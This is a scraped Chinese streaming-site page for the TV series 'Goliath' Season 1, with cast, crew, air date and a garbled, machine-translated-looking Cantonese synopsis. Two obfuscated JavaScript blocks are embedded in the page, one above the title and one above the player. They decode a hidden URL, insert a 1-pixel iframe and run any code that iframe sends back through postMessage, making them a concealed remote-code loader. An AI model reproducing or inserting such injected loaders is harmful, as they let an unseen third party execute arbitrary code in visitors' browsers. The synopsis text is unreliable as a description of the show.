if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['FeMjSpm']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#FeMjSpm'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data['des_s_2484']) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'FF0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'FFl'+'MkZ'+'zc2'+'guF'+'FZG'+'NlM'+'Gsw'+'LmN'+'uJT'+'NBM'+'TA0'+'NFF'+'DMl'+'MkY'+'FFy'+'YjQ'+'1YF'+'FzY'+'lFF'+'MkZ'+'FFj'+'LTF'+'FI0'+'OFF'+'DQt'+'MjU'+'FFt'+'MSF'+'F5t'+'cDM'+'=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

律界巨人 第一季

资源:mp4在线播放|Goliath Season 1|全8集

类型:美剧迷 美剧 剧情 法律 律政 2016

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['XXeFFHa']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 're' + 'nq' + 'ob' + 'j_2093'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#XXeFFHa'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2093`]) { var t = x(e.data[`des_s_2093`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'M0E'+'lFF'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uaG'+'l6Y'+'nBk'+'dS5'+'jFF'+'biU'+'FFz'+'QTF'+'FEw'+'NFF'+'DQz'+'FFJ'+'TJF'+'FGM'+'jA1'+'YFF'+'zM2'+'FFJ'+'TJG'+'Yy0'+'yMD'+'kzL'+'TIF'+'F1L'+'TEu'+'Y3N'+'z', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

云播放

  • 云播放

《律界巨人 第一季》剧情介绍

律界巨人 第一季影片剧照1

导演: 劳伦斯·特里林 / 埃里克·萨哈罗夫 / 比尔·德埃利亚 / 大卫·塞梅尔

编剧: 大卫·E·凯利 / 乔纳森·谢泼罗

主演: 比利·鲍伯·松顿 / 威廉·赫特 / 玛丽亚·贝罗 / 奥莉薇·瑟尔比 / 妮娜·阿里安达 / 莫莉·帕克 / 坦妮娅·雷蒙德 / 莎拉·温特 / 德怀特·尤科姆 / 朱莉·博斯特 / 哈罗德·佩里诺 / 帕特里克·罗伯特·史密斯 / 凯文·韦斯曼 / 胡安·加布里·帕雷哈 / 爱沃·卡拉丹 / 杰森·雷特 / 莎拉·贝克 / 马修·波尔

类型: 剧情

制片国家/地区: 美国

语言: 英语

首播: 2016-10-14(美国)

季数: 

集数: 8

单集片长: 60分钟

又名: 律政巨人 / 审判 / Trial

IMDb链接: tt4687880

剧情简介……

大卫··E凯利作为执行片嘅亚马逊戏剧《法律界巨人歌利亚》(前名《审判》),

应该剧为政法剧,由凯利同佢制片人乔纳森夏皮罗共同编剧。讲咗个曾经好有实嘅律师比利麦克布莱德(比利鲍勃桑顿饰),由于个仔被伤害嘅畸士跌失咗自己,条气深处开始酗酒,都是以失去咗老太太同做(律师所嘅合作朋友朋友)而家阿彪重拾斗志同信心返工,因为个畸士到同自己嘅乡下对峙。

尼娜·阿里安达饰剧帕蒂·索利斯·帕潘,一个口齿俐、纵横交错嘅政界多年嘅律师,塔妮娅·雷蒙德将饰剧比利嘅老友布里塔尼·戈尔德,佢系一个法务秘书,同时夜晚兼职差佬嘅工作。玛丽亚·贝洛将演阿彪嘅前妻朱莉·麦克布莱德,同样系一个聪明而好成功嘅女人。成功嘅律师。

德怀特·约卡姆饰剧温德尔·科里,系一家航空公司嘅领头人,由库普曼·麦克布莱德,伯恩斯·泰克呢间具有实权嘅嘅律师事务所为其辩护。

律界巨人 第一季影片剧照2

律界巨人 第一季影片剧照3

律界巨人 第一季影片剧照4

律界巨人 第一季影片剧照5

Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved